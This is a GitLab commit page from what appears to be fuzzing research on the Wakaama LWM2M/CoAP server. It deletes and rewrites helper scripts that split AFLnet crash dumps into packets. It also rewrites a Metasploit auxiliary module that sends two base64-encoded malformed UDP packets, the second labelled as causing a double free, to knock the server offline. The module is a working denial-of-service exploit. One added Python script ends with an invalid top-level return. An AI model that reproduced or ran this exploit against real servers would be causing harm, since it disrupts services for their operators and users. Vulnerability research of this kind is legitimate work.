Skip to content
Snippets Groups Projects
Commit 54173261 authored by poulpe's avatar poulpe
Browse files

[Add] Comment in script + metasploit module

parent 4ad8e57f
No related branches found
No related tags found
No related merge requests found
Show whitespace changes
Inline Side-by-side
DoS_CoAP.py deleted 100755 → 0
+ 0
87
View file @ 4ad8e57f
import time
import socket
from typing import List
import sys
# def send_packet(sock : socket,data : List[bytes],addr : str = "127.0.0.1",port : int = 5683):
# # sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# # sock.connect((addr,port))
# sock.send(data)
# def net_send(sock : socket.socket, buffer: list[bytes]):
# buffer_size = len(buffer)
# byte_count = 0
# print(buffer)
# while byte_count < buffer_size:
# # usleep(10);
# time.sleep(10 * 10**-6)
# byte_count += sock.send(buffer);
if __name__ == "__main__":
if len(sys.argv) < 1:
print(f"Usage: ./{sys.argv[0]} <file_aflnet_crash>")
file = open(sys.argv[1],"rb")
buf = ""
size = 0
data = file.read()
# print(":".join("{:02x}".format(c) for c in data))
length = 0
idx = 0
size = int.from_bytes(data[0:4],byteorder='little')
print(f"Packet size : {size}")
length = 0
cnt = 0
# sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
# host = socket.gethostbyname("localhost")
# sock.connect((host, 5683))
while size > 0:
# print(f"Length : {length}")
# print()
# print(":".join("{:02x}".format(c) for c in data[length:length + size]))
# print()
# print("Nbr of char : ",size)
# for i in range(0,size):
# # print(f"i : {i}", end=" ")
# try:
# print(chr(data[length+i]),end="")
# except:
# print("?")
# continue
# send_packet(sock,data[length:length+size])
# print(f"Len : {length}, size : {size}")
with open(f"{cnt}.raw","wb") as f:
f.write(data[length:length+size])
cnt += 1
# print()
# s = .decode('latin-1')
# s = str(data[length:length+size],'iso-8859-1')
# s = ''.join(map(chr, data[length+4:length + size]))
# print(s)
# print(":".join("{}".format(c.decode("ascii")) for c in data[length:length + size]))
# print()
# print(data[length:length + size].decode('iso-8859-1'))
# print("".join(ord(chr(c)) for c in data[length:length + size]))
# pkt = IP(dst="127.0.0.1")/UDP(sport=40564,dport=5683)/Raw(load=data[length:length + size])
# send(pkt)
length += size + 4
tmp_value_size = data[length:length+4]
# print("Size byte : ",":".join("{:02x}".format(c) for c in tmp_value_size))
size = int.from_bytes(tmp_value_size,byteorder='little')
if size == 0:
break
print(f"Packet size : {size}")
print("\n")
# sock.close()
# pkt = IP(dst="127.0.0.1")/UDP(dport=5683,sport=40564)/Raw(load=data[length:])
# send(pkt)
\ No newline at end of file
DoS_Lwm2m_Server.rb
+ 17
57
View file @ 54173261
......@@ -2,6 +2,8 @@
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Author : Troller Fabian
# Description : Execute the DoS attack on the server
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
......@@ -9,84 +11,42 @@ class MetasploitModule < Msf::Auxiliary
def initialize(info = {})
super(update_info(info,
'Name' => 'Wakaama LWM2M 2023-03-31 Denial of Service (DoS) Exploit',
'Name' => 'Wakaama LWM2M/CoAP 2023-03-31 Denial of Service (DoS) Exploit',
'Description' => %q{
This module allows remote attackers to cause a denial of service (DoS)
in Wakaama server via a specifically crafted UDP request.
},
'Author' =>
[
'Troller Fabian' # Metasploit module
'Troller Fabian'
],
'License' => MSF_LICENSE,))
register_options(
[
Opt::RHOST("127.0.0.1"),
Opt::RPORT(5683),
OptInt.new('ATTEMPTS', [true, 'Max number of attempts to DoS the remote Wakaama ending', 3])
])
end
def send_probe(udp_sock, probe)
udp_sock.put(probe)
data = udp_sock.recvfrom
if data and not data[0].empty?
return data[0]
else
return nil
end
end
def run
# the M-SEARCH probe packet that tries to identify whether the service is up or not
msearch_probe = "M-SEARCH * HTTP/1.1\r\n"
msearch_probe << "Host:239.255.255.250:1900\r\n"
msearch_probe << "ST:upnp:rootdevice\r\n"
msearch_probe << "Man:\"ssdp:discover\"\r\n"
msearch_probe << "MX:3\r\n"
msearch_probe << "\r\n"
# the M-SEARCH packet that is being read line by line: there shouldn't be CRLF after the
# ST line
sploit = "M-SEARCH * HTTP/1.1\r\n"
sploit << "HOST: 239.255.255.250:1900\r\n"
sploit << "ST:uuid:schemas:device:MX:3"
# the packet can be at most 1500 bytes long, so add appropriate number of ' ' or '\t'
# this makes the DoS exploit more probable, since we're occupying the stack with arbitrary
# characters: there's more chance that the program will run off the stack.
sploit += ' '*(1500-sploit.length)
# Create data for packet1 and packet2
packet_1 = "RAIl3Nwl/8SycmQRKDlsd20ybT0xLjENBWVwPXRlc3Rsd20ybWNsaWVudANiPVUGbHQ9MzAw/zwvPjtydD0ib21hLmx3bTJtIiw8LzEyMD4sPC8zLzA+LDwvMzEwMjQvMTA+LDwvMzEwMj4TPC8zLzA+LDwvNC8wPiw8LzUvMD4sPC82LzA+LDwvNy8wPiw8LzMxMDI0Pjt2ZXI9MS4wLDwvMzEwMjQvMTA+LDwvMzEwMjQvMTE+LDwvMzEwMjQvMTI+RAJtt7dtUnCycmQRKDlsd20ybT0xKTENBWVwPXRlc3Rsd20ybWNsaWVudANiPVUGbHQ9MzAwwQv/PC8+O3J0PSJvbWEubHdtMm0iO2N0PTExMCw8LzE+O3Zlcj0xLjEsPC8xLzA+LDwvMi8wPiw8LzM5MD4sPC80LzA+LDwvNS8wPiw8LzYvMD4sPC83LzA+gDwvMzEwMjQ+O3Zlcj0xLjAsPC8zMTAyNC8xMD4sPC8zMTAyNC8xMT5EAm24t21ScLJyZBEoOWx3bTJtPTEuMQ0FZXA9dGVzdGx3bTJtY2xpZW50A2I9VQZsdD0zMDDBE/8sPC8zMTAyNC8xMj5EAm24t21ScLJyZBEoOWx3bTJtPTEuMQ0F3Nzc3Nzc3Nzc3Nzc3Nzc3NxlcD10ZXN0bHdtMm1jbGllbnQDYj1VBmx0PTMwMMET/yw8LzMxMDI0LzEyPkQCF3RlUFVUd229Mf8xDQdlPA=="
packet_2 = "RAIl3Nwl/8SycmQRKDlsd20ybT0xLjENBWVwPXRlc3Rsd20ybWNsaWVudJhiPVUGbHQhMzAw/zwvPjtydD0ib21hLmx3bTJtIiw8LzEvMD4sPC8zLzA+IjwvMzEwMjQvMTJtPTEuMQ0FZXA9dGVrdGx3bTJtY2xpZW50ADAyNA=="
# connect to the UDP port
connect_udp
print_status("#{rhost}:#{rport} - Checking UPnP...")
response = send_probe(udp_sock, msearch_probe)
if response.nil?
print_error("#{rhost}:#{rport} - UPnP end not found")
disconnect_udp
return
end
print_status("#{rhost}:#{rport} - Checking LWM2M...")
# response = send_probe(udp_sock, packet_1)
response = udp_sock.put(Base64.decode64(packet_1)) # Create client
(1..datastore['ATTEMPTS']).each { |attempt|
print_status("#{rhost}:#{rport} - UPnP DoS attempt #{attempt}...")
# send the exploit to the target
print_status("#{rhost}:#{rport} - Sending malformed packet...")
udp_sock.put(sploit)
# send the probe to the target
print_status("#{rhost}:#{rport} - The target should be unresponsive now...")
response = send_probe(udp_sock, msearch_probe)
if response.nil?
print_good("#{rhost}:#{rport} - UPnP unresponsive")
disconnect_udp
return
else
print_status("#{rhost}:#{rport} - UPnP is responsive still")
end
}
udp_sock.put(Base64.decode64(packet_2)) # Drop the load double free
disconnect_udp
print_status("Exploit finished for server : #{rhost}:#{rport}")
end
end
\ No newline at end of file
Segment_Aflnet_Dump.py 0 → 100755
+ 41
0
View file @ 54173261
# Author : Troller Fabian
# Description : Script to segment the file create by AFLnet
# Date : 2023-07-03
import time
import socket
from typing import List
import sys
if __name__ == "__main__":
if len(sys.argv) < 1:
print(f"Usage: ./{sys.argv[0]} <file_aflnet_crash>")
exit(1)
file = open(sys.argv[1],"rb")
buf = ""
size = 0
data = file.read()
length = 0
idx = 0
# Get packet size for sending
size = int.from_bytes(data[0:4],byteorder='little')
print(f"Packet size : {size}")
length = 0
cnt = 1
while size > 0:
# Write to file the parsed data
with open(f"{cnt}.raw","wb") as f:
f.write(data[length:length+size])
cnt += 1
length += size + 4
tmp_value_size = data[length:length+4]
# Get packet size for sending
size = int.from_bytes(tmp_value_size,byteorder='little')
if size == 0:
break
print(f"Packet size : {size}")
print("\n")
return 0
\ No newline at end of file
0% or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment